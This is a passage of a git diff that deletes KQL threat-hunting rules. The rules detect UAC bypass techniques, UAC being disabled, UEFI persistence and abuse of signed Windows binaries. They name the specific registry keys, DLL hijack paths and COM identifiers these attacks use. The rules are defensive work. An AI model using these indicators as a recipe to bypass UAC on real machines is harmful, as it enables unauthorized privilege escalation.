-| where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql
deleted file mode 100644
index b14f6498..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\werfault.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\consent.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql b/Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql
deleted file mode 100644
index 949e3b2b..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Disk_Cleanup.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ProcessCommandLine endswith "\"\\system32\\cleanmgr.exe /autoclean /d C:" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_DismHost.kql b/Defense Evasion/UAC_Bypass_Using_DismHost.kql
deleted file mode 100644
index 63f130be..00000000
--- a/Defense Evasion/UAC_Bypass_Using_DismHost.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and (InitiatingProcessFolderPath contains "C:\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "\\DismHost.exe")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_EventVwr.kql b/Defense Evasion/UAC_Bypass_Using_EventVwr.kql
deleted file mode 100644
index 3043fd99..00000000
--- a/Defense Evasion/UAC_Bypass_Using_EventVwr.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)
-// Date: 2022/04/27
-// Level: high
-// Description: Detects the pattern of a UAC bypass using Windows Event Viewer
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceFileEvents
-| where (FolderPath endswith "\\Microsoft\\Event Viewer\\RecentViews" or FolderPath endswith "\\Microsoft\\EventV~1\\RecentViews") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql b/Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql
deleted file mode 100644
index 974b22fe..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Event_Viewer_RecentViews.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/11/22
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Event Viewer RecentViews
-// Tags: attack.defense_evasion, attack.privilege_escalation
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Event Viewer\\RecentViews" or ProcessCommandLine contains "\\EventV~1\\RecentViews") and ProcessCommandLine contains ">"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql b/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql
deleted file mode 100644
index 26df3a86..00000000
--- a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql b/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql
deleted file mode 100644
index 25b12cc5..00000000
--- a/Defense Evasion/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/03
-// Level: high
-// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql b/Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql
deleted file mode 100644
index 1ca85fad..00000000
--- a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "C:\\Program Files\\Internet Explorer\\IEInstal.exe" and FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql
deleted file mode 100644
index eaf21560..00000000
--- a/Defense Evasion/UAC_Bypass_Using_IEInstal_-_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath endswith "consent.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\ieinstal.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql b/Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql
deleted file mode 100644
index 7d63fa2a..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/17
-// Level: high
-// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceImageLoadEvents
-| where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql b/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql
deleted file mode 100644
index cadc4f08..00000000
--- a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql
deleted file mode 100644
index ebc4f60d..00000000
--- a/Defense Evasion/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ProcessCommandLine =~ "\"C:\\Windows\\system32\\msconfig.exe\" -5" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\pkgmgr.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql b/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql
deleted file mode 100644
index 79b84858..00000000
--- a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql
deleted file mode 100644
index a2dfe81e..00000000
--- a/Defense Evasion/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "\\AppData\\Local\\Temp\\update.msu" and ProcessCommandLine startswith "\"C:\\Windows\\system32\\wusa.exe\"  /quiet C:\\Users\\" and (ProcessIntegrityLevel in~ ("High", "System"))) or ((ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "\\dismhost.exe {") and FolderPath endswith "\\DismHost.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql b/Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql
deleted file mode 100644
index 594500b1..00000000
--- a/Defense Evasion/UAC_Bypass_Using_PkgMgr_and_DISM.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\dism.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\pkgmgr.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql b/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql
deleted file mode 100644
index ef7a7239..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_File.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where (FolderPath endswith "\\AppData\\Local\\Temp\\OskSupport.dll" and FolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\DllHost.exe" and FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql
deleted file mode 100644
index 96f8c1bd..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (FolderPath =~ "C:\\Program Files\\Windows Media Player\\osk.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) or (FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine =~ "\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql b/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql
deleted file mode 100644
index dc52850a..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Via_Wsreset.kql b/Defense Evasion/UAC_Bypass_Via_Wsreset.kql
deleted file mode 100644
index 7ddbf642..00000000
--- a/Defense Evasion/UAC_Bypass_Via_Wsreset.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/07
-// Level: high
-// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_WSReset.kql b/Defense Evasion/UAC_Bypass_WSReset.kql
deleted file mode 100644
index b39549cb..00000000
--- a/Defense Evasion/UAC_Bypass_WSReset.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\wsreset.exe" and (ProcessIntegrityLevel in~ ("High", "System"))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_With_Fake_DLL.kql b/Defense Evasion/UAC_Bypass_With_Fake_DLL.kql
deleted file mode 100644
index ea6ebd96..00000000
--- a/Defense Evasion/UAC_Bypass_With_Fake_DLL.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/06
-// Level: high
-// Description: Attempts to load dismcore.dll after dropping it
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_via_Event_Viewer.kql b/Defense Evasion/UAC_Bypass_via_Event_Viewer.kql
deleted file mode 100644
index c13ab477..00000000
--- a/Defense Evasion/UAC_Bypass_via_Event_Viewer.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/03/19
-// Level: high
-// Description: Detects UAC bypass method using Windows event viewer
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey endswith "\\mscfile\\shell\\open\\command"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql b/Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql
deleted file mode 100644
index e6a2379f..00000000
--- a/Defense Evasion/UAC_Bypass_via_ICMLuaUtil.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Elastic (idea)
-// Date: 2022/09/13
-// Level: high
-// Description: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where ((InitiatingProcessCommandLine contains "/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" or InitiatingProcessCommandLine contains "/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}") and InitiatingProcessFolderPath endswith "\\dllhost.exe") and (not((FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_via_Sdclt.kql b/Defense Evasion/UAC_Bypass_via_Sdclt.kql
deleted file mode 100644
index 62170641..00000000
--- a/Defense Evasion/UAC_Bypass_via_Sdclt.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Omer Yampel, Christian Burkard (Nextron Systems)
-// Date: 2017/03/17
-// Level: high
-// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceRegistryEvents
-| where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue")
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Disabled.kql b/Defense Evasion/UAC_Disabled.kql
deleted file mode 100644
index 0ee19c33..00000000
--- a/Defense Evasion/UAC_Disabled.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: frack113
-// Date: 2022/01/05
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Notification_Disabled.kql b/Defense Evasion/UAC_Notification_Disabled.kql
deleted file mode 100644
index 0c9d6980..00000000
--- a/Defense Evasion/UAC_Notification_Disabled.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
-UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users.
-When "UACDisableNotify" is set to 1, UAC prompts are suppressed.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Security Center\\UACDisableNotify"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql b/Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql
deleted file mode 100644
index 684fe543..00000000
--- a/Defense Evasion/UAC_Secure_Desktop_Prompt_Disabled.kql	
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2024/05/10
-// Level: medium
-// Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value.
-The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.
-When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.
-
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop"
\ No newline at end of file
diff --git a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql b/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql
deleted file mode 100644
index b24cd1fc..00000000
--- a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/18
-// Level: high
-// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
-// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql b/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql
deleted file mode 100644
index dba934a8..00000000
--- a/Defense Evasion/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/18
-// Level: high
-// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
-// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001
-DeviceProcessEvents
-| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql b/Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql
deleted file mode 100644
index 6ef2677f..00000000
--- a/Defense Evasion/Uncommon_AddinUtil.EXE_CommandLine_Execution.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023/09/18
-// Level: medium
-// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-AddInRoot:" or ProcessCommandLine contains "-PipelineRoot:") and (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe")) and (not((ProcessCommandLine contains "-AddInRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-AddInRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA" or ProcessCommandLine contains "-PipelineRoot:C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTA")))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql
deleted file mode 100644
index 6ee88ff8..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Of_AddinUtil.EXE.kql	
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
-// Date: 2023/09/18
-// Level: medium
-// Description: Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\addinutil.exe" and (not((FolderPath endswith ":\\Windows\\System32\\conhost.exe" or FolderPath endswith ":\\Windows\\System32\\werfault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\werfault.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql
deleted file mode 100644
index b28bbd12..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Of_Appvlp.EXE.kql	
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: Sreeman
-// Date: 2020/03/13
-// Level: medium
-// Description: Detects uncommon child processes of Appvlp.EXE
-Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands.
-Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder
-or to mark a file as a system file.
-
-// Tags: attack.t1218, attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\appvlp.exe" and (not((FolderPath endswith ":\\Windows\\SysWOW64\\rundll32.exe" or FolderPath endswith ":\\Windows\\System32\\rundll32.exe"))) and (not(((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\msoasb.exe") or (FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath endswith "\\MSOUC.EXE") or ((FolderPath contains ":\\Program Files\\Microsoft Office" and FolderPath contains "\\SkypeSrv\\") and FolderPath endswith "\\SKYPESERVER.EXE"))))
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql
deleted file mode 100644
index 77dfd04d..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Of_BgInfo.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
-// Date: 2019/10/26
-// Level: medium
-// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
-// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql
deleted file mode 100644
index 43fcebb7..00000000
--- a/Defense Evasion/Uncommon_Child_Process_Of_Defaultpack.EXE.kql	
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/31
-// Level: medium
-// Description: Detects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
-// Tags: attack.t1218, attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\DefaultPack.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql b/Defense Evasion/Uncommon_Child_Process_Spawned_By_Odbcconf.EXE.kql
deleted file mode 100644
index 0ea3864c..00000000
